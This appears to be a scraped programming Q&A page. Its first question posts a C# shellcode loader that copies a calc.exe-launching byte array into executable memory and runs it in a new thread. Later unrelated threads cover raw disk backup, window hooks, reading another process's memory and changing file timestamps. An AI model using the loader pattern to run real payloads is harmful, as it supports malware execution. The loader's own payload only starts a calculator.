Develop Reference

system.overflow exception in c# while trying to process injection - c#

I'm new at process injection. I'm trying to write my first process injection program in c# but, I always get this error: system.overflow exception
System.OverflowException: 'Arithmetic operation resulted in an overflow'
my code is :
using System;
using System.Runtime.InteropServices;
namespace demo
{
class Program
{
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, int dwSize, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32.dll")]
private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);
[DllImport("kernel32.dll")]
private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
static void Main(string[] args)
{
byte[] buf = new byte[193] {
0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,
0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,
0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,
0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,
0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,
0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,
0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,
0x8d,0x5d,0x6a,0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,
0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,
0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,
0x00,0x53,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x00 };
int shellcode_size = buf.Length;
IntPtr init = VirtualAlloc(IntPtr.Zero, shellcode_size, (UInt32)TYPE.MEM_COMMIT, (UInt32)PROTECTION.PAGE_EXECUTE_READWRITE);
Marshal.Copy(buf, 0, init, shellcode_size);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
IntPtr pinfo = IntPtr.Zero;
hThread = CreateThread(0, 0, (UInt32)init, pinfo, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF);
}
public enum TYPE
{
MEM_COMMIT = 0x00001000
}
public enum PROTECTION
{
PAGE_EXECUTE_READWRITE = 0x40
}
}
}
so, can anyone help me?
I asked this question to chatgpt, it said change the shellcode type to int64(long). but, it didn't work because VirtualAlloc function always wants int32.

Related

I want to be able to copy 4 GBs of data from a drive to a file and restore it. Here's my code:
class Program
{
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool CloseHandle(IntPtr handle);
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
internal extern static IntPtr CreateFile(
String fileName,
int dwDesiredAccess,
FileShare dwShareMode,
IntPtr securityAttrs_MustBeZero,
FileMode dwCreationDisposition,
int dwFlagsAndAttributes,
IntPtr hTemplateFile_MustBeZero);
[DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
static extern bool GetVolumeInformationByHandleW(
IntPtr hDisk,
StringBuilder volumeNameBuffer,
int volumeNameSize,
ref uint volumeSerialNumber,
ref uint maximumComponentLength,
ref uint fileSystemFlags,
StringBuilder fileSystemNameBuffer,
int nFileSystemNameSize);
// Used to read in a file
[DllImport("kernel32.dll")]
public static extern bool ReadFile(
IntPtr hFile,
byte[] lpBuffer,
uint nNumberOfBytesToRead,
ref uint lpNumberOfBytesRead,
IntPtr lpOverlapped);
[DllImport("kernel32.dll")]
public static extern bool WriteFile(
IntPtr hFile,
byte[] lpBuffer,
uint nNumberOfBytesToWrite,
out uint lpNumberOfBytesWritten,
[In] ref NativeOverlapped lpOverlapped);
// Used to set the offset in file to start reading
[DllImport("kernel32.dll")]
public static extern bool SetFilePointerEx(
IntPtr hFile,
long liDistanceToMove,
ref long lpNewFilePointer,
uint dwMoveMethod);
internal const int GENERIC_READ = unchecked((int)0x80000000);
internal const int FILE_FLAG_BACKUP_SEMANTICS = unchecked((int)0x02000000);
internal const int OPEN_EXISTING = unchecked((int)3);
static void Main(string[] args)
{
IntPtr hDrive = CreateFile(
string.Format("\\\\.\\{0}:", "G"),
GENERIC_READ,
FileShare.Read | FileShare.Write,
IntPtr.Zero,
(FileMode)OPEN_EXISTING,
0,
IntPtr.Zero);
RunBackup(hDrive);
RunRestore(hDrive);
CloseHandle(hDrive);
}
private static void RunRestore(IntPtr handle)
{
// Set offset
uint chunks = 100;
uint bufferSize = 512 * chunks;
long pt = 0;
byte[] buffer = new byte[bufferSize];
SetFilePointerEx(
handle,
0,
ref pt,
0);
long oneGB = 1073741824;
var backupSize = oneGB * 4;
var loops = backupSize / bufferSize;
Console.WriteLine($"Expecting {loops:N0} loops.");
var ol = new NativeOverlapped();
uint written = 0;
using (var reader = new BinaryReader(File.OpenRead(#"D:\\fat.backup")))
{
for (int i = 0; i < loops; i++)
{
reader.Read(buffer);
WriteFile(
handle,
buffer,
bufferSize,
out written,
ref ol);
Console.Write($"\rLoop: {i:N0}");
}
reader.Close();
}
}
private static void RunBackup(IntPtr handle)
{
// Set offset
uint chunks = 100;
uint bufferSize = 512 * chunks;
long pt = 0;
byte[] buffer = new byte[bufferSize];
SetFilePointerEx(
handle,
0,
ref pt,
0);
long oneGB = 1073741824;
var backupSize = oneGB * 4;
var loops = backupSize / bufferSize;
Console.WriteLine($"Expecting {loops:N0} loops.");
uint read = 0;
using (var writer = new BinaryWriter(File.OpenWrite(#"D:\\fat.backup")))
{
for (int i = 0; i < loops; i++)
{
ReadFile(
handle,
buffer,
bufferSize,
ref read,
IntPtr.Zero);
writer.Write(buffer);
writer.Flush();
Console.Write($"\rLoop: {i:N0}");
}
writer.Close();
}
}
}
The backup function seems to be working as expected. However, in the restore part, when the program calls the WriteFile, the written variable is always 0. Am I doing something wrong?

You use the same handle for both routines, and it was opened for read access.
If you open a file for read only, and then use the same handle to write, it's pretty obvious you're going to have problems.
Solution
In order to write to the disk use the CreateFile function like this:
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
internal extern static IntPtr CreateFile(
String fileName,
FileAccess access,
FileShare dwShareMode,
IntPtr securityAttrs_MustBeZero,
FileMode dwCreationDisposition,
int dwFlagsAndAttributes,
IntPtr hTemplateFile_MustBeZero);
IntPtr handle = CreateFile(
string.Format("\\\\.\\{0}:", driveLetter),
(FileAccess)(0x40000000),
(FileShare)0x00000001,
IntPtr.Zero,
FileMode.OpenOrCreate,
0x00000080,
IntPtr.Zero);

I am trying to make a program that writes the active window title, whenever it changes to the console window.
Here's my code, It does work in a winform application but not in a console application, I couldn't figure out what's wrong.
Any help would be appreciated.
class Program
{
delegate void WinEventDelegate(IntPtr hWinEventHook, uint eventType, IntPtr hwnd, int idObject, int idChild, uint dwEventThread, uint dwmsEventTime);
[DllImport("user32.dll")]
static extern IntPtr SetWinEventHook(uint eventMin, uint eventMax, IntPtr hmodWinEventProc, WinEventDelegate lpfnWinEventProc, uint idProcess, uint idThread, uint dwFlags);
private const uint WINEVENT_OUTOFCONTEXT = 0;
private const uint EVENT_SYSTEM_FOREGROUND = 3;
[DllImport("user32.dll")]
static extern IntPtr GetForegroundWindow();
[DllImport("user32.dll")]
static extern int GetWindowText(IntPtr hWnd, StringBuilder text, int count);
private string GetActiveWindowTitle()
{
const int nChars = 256;
IntPtr handle = IntPtr.Zero;
StringBuilder Buff = new StringBuilder(nChars);
handle = GetForegroundWindow();
if (GetWindowText(handle, Buff, nChars) > 0)
{
return Buff.ToString();
}
return null;
}
public void WinEventProc(IntPtr hWinEventHook, uint eventType, IntPtr hwnd, int idObject, int idChild, uint dwEventThread, uint dwmsEventTime)
{
Console.WriteLine(GetActiveWindowTitle() + "\r\n");
}
static void Main(string[] args)
{
WinEventDelegate dele = null;
Program a = new Program();
dele = new WinEventDelegate(a.WinEventProc);
IntPtr m_hhook = SetWinEventHook(EVENT_SYSTEM_FOREGROUND, EVENT_SYSTEM_FOREGROUND, IntPtr.Zero, dele, 0, 0, WINEVENT_OUTOFCONTEXT);
Console.ReadKey();
}
}

"The client thread that calls SetWinEventHook must have a message loop in order to receive events." Threads in a console application don't have message loops. Unless you build one:
using System.ComponentModel;
using System.Windows.Forms;
...
[DllImport("user32.dll", SetLastError = true)]
static extern int GetMessage(out Message lpMsg, IntPtr hwnd, int wMsgFilterMin, int wMsgFilterMax);
[DllImport("user32.dll")]
static extern int TranslateMessage(Message lpMsg);
[DllImport("user32.dll")]
static extern int DispatchMessage(Message lpMsg);
Then replace Console.ReadKey() with
Message msg;
while (true) {
int result = GetMessage(out msg, IntPtr.Zero, 0, 0);
if (result == 0) break;
if (result == -1) throw new Win32Exception();
TranslateMessage(msg);
DispatchMessage(msg);
}
I'm being lazy and taking the Message structure from System.Windows.Forms. You could add the definition of that separately if you don't want to take the dependency.
Since this thread is now occupied with processing messages, you probably want to do this on a separate dedicated thread if you want to do other processing.

I want to get all tray icons on windows7(64bit) with C#,but when i used the windows api "ReadProcessMemory" ,the tray button Text can't be recognied.
codes below
IntPtr pid = IntPtr.Zero;
IntPtr ipHandle = IntPtr.Zero;
IntPtr lTextAdr = IntPtr.Zero;
IntPtr ipTray = TrayToolbarWindow32();
WinApiHelper.GetWindowThreadProcessId(ipTray, ref pid);
if (pid.Equals(0))
return iconList;
IntPtr hProcess = WinApiHelper.OpenProcess(WinApiHelper.PROCESS_ALL_ACCESS | WinApiHelper.PROCESS_VM_OPERATION | WinApiHelper.PROCESS_VM_READ | WinApiHelper.PROCESS_VM_WRITE, IntPtr.Zero, pid);
IntPtr lAddress = WinApiHelper.VirtualAllocEx(hProcess, 0, 4096, WinApiHelper.MEM_COMMIT, WinApiHelper.PAGE_READWRITE);
int lButton = WinApiHelper.SendMessage(ipTray, WinApiHelper.TB_BUTTONCOUNT, 0, 0);
for (int i = 0; i < lButton; i++)
{
WinApiHelper.SendMessage(ipTray, WinApiHelper.TB_GETBUTTON, i, lAddress);
WinApiHelper.ReadProcessMemory(hProcess, (IntPtr)(lAddress.ToInt32() + 16), ref lTextAdr, 4, 0);
if (!lTextAdr.Equals(-1))
{
byte[] buff = new byte[ 1024 ];
WinApiHelper.ReadProcessMemory(hProcess, lTextAdr, buff, 1024, 0);
string title = System.Text.ASCIIEncoding.Unicode.GetString(buff);
and api declaration
[DllImport("kernel32", EntryPoint = "ReadProcessMemory")]
public static extern int ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, ref IntPtr lpBuffer, int nSize, int lpNumberOfBytesWritten);
[DllImport("kernel32.dll", EntryPoint = "ReadProcessMemory")]
public static extern bool ReadProcessMemoryEx(IntPtr hProcess, IntPtr lpBaseAddress, [In, Out] byte[] buffer, IntPtr size, out IntPtr lpNumberOfBytesRead);
[DllImport("kernel32", EntryPoint = "ReadProcessMemory")]
public static extern int ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, [In, Out] byte[] lpBuffer, int nSize, int lpNumberOfBytesWritten);
[DllImport("kernel32.dll")]
public static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, IntPtr lpBuffer, UIntPtr nSize, IntPtr lpNumberOfBytesRead);
the problem is here
string title = System.Text.ASCIIEncoding.Unicode.GetString(buff);
when converted , the string "title" can't be recognized,it maybe like
ǎ\0\0\0\0Д\0\0à\0\0ƿ\r\0\0\0\0\0\0\0\0\0\0D:\\Tools\\ESET Smart Security\\egui.exe\0\0\0\0\0\0\0\0\0\0\0\0\0\
i don't know why, help.

You may want to consider what you are doing. ReadProcessMemory is a debug function designed for debuggers which requires SeDebugPrivilege, so I hope you are writing a debugger. Ignoring the queasiness I get from considering use of these functions in a non-debug capacity, you are leaking the buffer you allocated and requiring that your application run as administrator.
If this application is only for your own purposes and for no-one else, then check out the related question Systray Access, as it seems that there is a separate TB_GETBUTTONTEXT message. I imagine that you are actually receiving the button data, rather than text in the copied memory, causing issues.

I trying to marshaling C# code from WinApi functions..
But i understand.. WHYYY WHYY she dont work! Filepath - is correct, handle is taken.
Can anyone help me?
using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Linq;
using System.Text;
namespace ChangeFileTime
{
class Program
{
[DllImport("kernel32.dll", SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool SetFileTime(IntPtr hFile, ref long lpCreationTime,
ref long lpLastAccessTime,
ref long lpLastWriteTime);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateFile(string lpFilename,
uint dwDesiredAccess,
uint dwShareMode,
IntPtr SecurityAttributes,
uint dwCreationDisposition,
uint dwFlagsAndAttributes,
IntPtr hTemplateFile);
[DllImport("kernel32.dll")]
public static extern bool CloseHandle(IntPtr hObject);
static void Main(string[] args)
{
const uint GENERIC_READ = 0x80000000;
const uint OPEN_EXISTING = 3;
const uint FILE_SHARE_WRITE = 0x00000002;
const uint FILE_ATTRIBUTE_NORMAL = 128;
IntPtr ptr = CreateFile("C:\\file.txt", GENERIC_READ,
FILE_SHARE_WRITE,
IntPtr.Zero,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
IntPtr.Zero);
DateTime creation_time = new DateTime(1990, 12, 14);
long file_time = creation_time.ToFileTime();
DateTime time = DateTime.FromFileTime(file_time);
SetFileTime(ptr, ref file_time, ref file_time, ref file_time);
int a = 20;
}
}
}
I think i got mistake.. i try to write C++ code, and she work fine.. but why in C# dont work?

From MSDN:
The handle must have been created using the CreateFile function with
the FILE_WRITE_ATTRIBUTES
This should work:
const uint FILE_WRITE_ATTRIBUTES = 0x0100;
IntPtr ptr = CreateFile("C:\\file.txt", FILE_WRITE_ATTRIBUTES, //...

This question already has answers here:
Closed 11 years ago.
Possible Duplicates:
Windows CDROM Eject
Open CD/DVD door with a Windows API call?
I have looked around and can't find a simple solution to what I want to do.
I want to open a CD-Rom from my C# app. It should check if the media is in fact a cd- rom and then open it. Is there a quick solution to this or am I missing something?

Check this URL, it has both managed and unmanaged code for .net
http://bytes.com/topic/c-sharp/answers/273513-how-eject-cd-rom-c
Try below code :
using System;
using System.Text;
using System.Runtime.InteropServices;
namespace EjectMedia
{
class Program
{
static void Main(string[] args)
{
// My CDROM is on drive E:
EjectMedia.Eject(#"\\.\E:");
}
}
class EjectMedia
{
// Constants used in DLL methods
const uint GENERICREAD = 0x80000000;
const uint OPENEXISTING = 3;
const uint IOCTL_STORAGE_EJECT_MEDIA = 2967560;
const int INVALID_HANDLE = -1;
// File Handle
private static IntPtr fileHandle;
private static uint returnedBytes;
// Use Kernel32 via interop to access required methods
// Get a File Handle
[DllImport("kernel32", SetLastError = true)]
static extern IntPtr CreateFile(string fileName,
uint desiredAccess,
uint shareMode,
IntPtr attributes,
uint creationDisposition,
uint flagsAndAttributes,
IntPtr templateFile);
[DllImport("kernel32", SetLastError=true)]
static extern int CloseHandle(IntPtr driveHandle);
[DllImport("kernel32", SetLastError = true)]
static extern bool DeviceIoControl(IntPtr driveHandle,
uint IoControlCode,
IntPtr lpInBuffer,
uint inBufferSize,
IntPtr lpOutBuffer,
uint outBufferSize,
ref uint lpBytesReturned,
IntPtr lpOverlapped);
public static void Eject(string driveLetter)
{
try
{
// Create an handle to the drive
fileHandle = CreateFile(driveLetter,
GENERICREAD,
0,
IntPtr.Zero,
OPENEXISTING,
0,
IntPtr.Zero);
if ((int)fileHandle != INVALID_HANDLE)
{
// Eject the disk
DeviceIoControl(fileHandle,
IOCTL_STORAGE_EJECT_MEDIA,
IntPtr.Zero, 0,
IntPtr.Zero, 0,
ref returnedBytes,
IntPtr.Zero);
}
}
catch
{
throw new Exception(Marshal.GetLastWin32Error().ToString());
}
finally
{
// Close Drive Handle
CloseHandle(fileHandle);
fileHandle = IntPtr.Zero;
}
}
}
}